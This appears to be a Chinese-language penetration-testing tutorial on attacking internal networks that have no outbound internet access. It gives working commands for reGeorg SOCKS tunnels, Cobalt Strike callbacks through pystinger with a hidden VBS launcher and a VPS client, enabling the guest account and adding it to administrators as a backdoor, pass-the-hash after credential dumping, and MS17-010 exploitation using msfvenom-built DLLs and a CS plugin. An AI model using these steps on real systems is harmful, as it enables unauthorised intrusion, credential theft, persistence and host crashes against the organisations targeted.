内网渗透:不出网渗透技巧
字数 1053 2025-08-15 21:31:48
内网渗透:不出网渗透技巧详解
前言
在内网渗透中,经常会遇到目标内网不通外网的情况,本文将详细介绍几种不出网环境下的内网渗透技巧。
1. Socks隧道搭建
工具准备
- reGeorg
- Proxifier
操作步骤
- 上传对应语言的脚本到目标服务器的网站目录下
- 通过浏览器访问上传的脚本文件,确认返回正常表示成功
- 本地运行reGeorgSocksProxy.py:
python reGeorgSocksProxy.py -p 8888 -u http://x.x.x.x/tunnel.php - 成功后将本机带入内网环境
2. Cobalt Strike (CS)上线技巧
使用pystinger工具
下载地址:https://github.com/FunnyWolf/pystinger
操作步骤
- 上传对应语言的脚本到网站目录下
- 将stinger_server.exe上传到目标服务器
- 创建stinger_server.vbs文件:
Set ws = CreateObject("Wscript.Shell") ws.run "cmd /c D:\XXXXX\stinger_server.exe 0.0.0.0",vbhide - 在公网VPS上运行stinger_client:
chmod 777 stinger_client ./stinger_client -w http://x.x.x.x/proxy.jsp -l 0.0.0.0 -p 60000 - 抓取上线主机密码,对内网其它主机进行PTH攻击
注意事项:
- CS会话可能假死,需结束stinger_server.exe进程后重新启动
在目标内网搭建CS服务端
前提:已获取管理员权限
操作步骤
- 激活guest用户:
net user guest /active:yes net user guest 1q2w3e4r@ net localgroup administrators guest /add - 上传CS4.0到目标服务器
- 运行服务端:
teamserver.bat x.x.x.x 1q2w3e4r - 运行客户端cs.bat
缺点:
- 被发现概率高
- 需要安装Java环境
- 基于web的socks隧道速度慢
3. MS17-010横向利用
方程式漏洞利用工具
操作步骤
- 生成对应监听器的bin文件
- 使用msfvenom转换文件:
msfvenom -p generic/custom PAYLOADFILE=./payload.bin -a x64 --platform windows -f dll -o x64.dll - 替换原x64.dll文件,上传工具到目标主机
- 设置targetip为存在漏洞的主机IP,选择系统类型,执行攻击
- 选择doublepulsar模块,配置IP和位数,加载生成的x64.dll
CS永恒之蓝利用插件
下载地址:https://github.com/phink-team/Cobaltstrike-MS17-010
操作步骤
- 安装插件,导入aggressor.cna文件
- 使用pystinger多主机模式使内网主机上线
- 生成内网监听器test
- 右键使用ms17-010攻击插件:
- 配置目标IP
- 选择test监听器
- 攻击次数设为1(降低蓝屏风险)
总结
本文介绍了不出网环境下的内网渗透技巧,包括:
- Socks隧道搭建
- CS上线方法(pystinger和内网搭建服务端)
- MS17-010横向利用(方程式工具和CS插件)
注意事项:
- MS17-010利用可能导致目标蓝屏,需谨慎使用
- 内网搭建CS服务端被发现风险较高
- 隧道速度可能影响操作体验